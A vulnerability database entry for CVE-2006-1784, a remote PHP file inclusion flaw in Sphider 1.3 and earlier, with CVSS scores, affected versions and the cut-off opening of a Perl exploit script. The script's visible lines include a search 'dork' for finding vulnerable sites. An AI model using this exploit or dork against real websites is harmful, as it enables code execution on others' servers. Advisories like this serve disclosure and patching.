5.1
CVSSv2

CVE-2006-1784

Published: 13/04/2006 Updated: 19/10/2017
CVSS v2 Base Score: 5.1 | Impact Score: 6.4 | Exploitability Score: 4.9
VMScore: 515
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in admin/configset.php in Sphider 1.3 and previous versions, when register_globals is disabled, allows remote malicious users to execute arbitrary PHP code via a URL in the settings_dir parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

sphider sphider 1.3

sphider sphider 1.3_rc1

sphider sphider 1.3_rc2

Exploits

#!/usr/bin/perl use IO::Socket; print "\r\nSphider <= 13 arbitrary remote inclusion\r\n" ; print "-> works with register_globals = On & allow_url_fopen = On\r\n"; print "by rgod rgod<AT>autistici<DOT>org\r\n"; print "site: retrogodaltervistaorg\r\n"; print "\r\ndork: \"powered by sphider\"\r\n"; sub main::urlEncode ...